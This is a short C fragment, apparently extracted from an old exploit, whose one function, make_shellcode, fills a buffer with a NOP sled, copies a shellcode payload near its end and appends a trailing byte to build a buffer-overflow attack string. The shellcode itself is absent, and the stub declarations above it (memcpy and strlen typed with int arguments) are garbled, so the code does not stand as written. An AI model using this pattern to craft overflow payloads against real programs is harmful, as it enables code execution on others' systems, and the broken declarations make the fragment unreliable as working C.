
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int SIZ ;
 int memcpy (char*,int ,int) ;
 int memset (char*,int,int) ;
 int shellcode ;
 int strcat (char*,char*) ;
 int strlen (int ) ;

void make_shellcode(char *b) {
 int l;

 memset(b,0,SIZ-1);
 memset(b,0x90,SIZ-40);
 memcpy(b+(SIZ-42)-strlen(shellcode), shellcode, strlen(shellcode));
 strcat(b,"\x01");
}
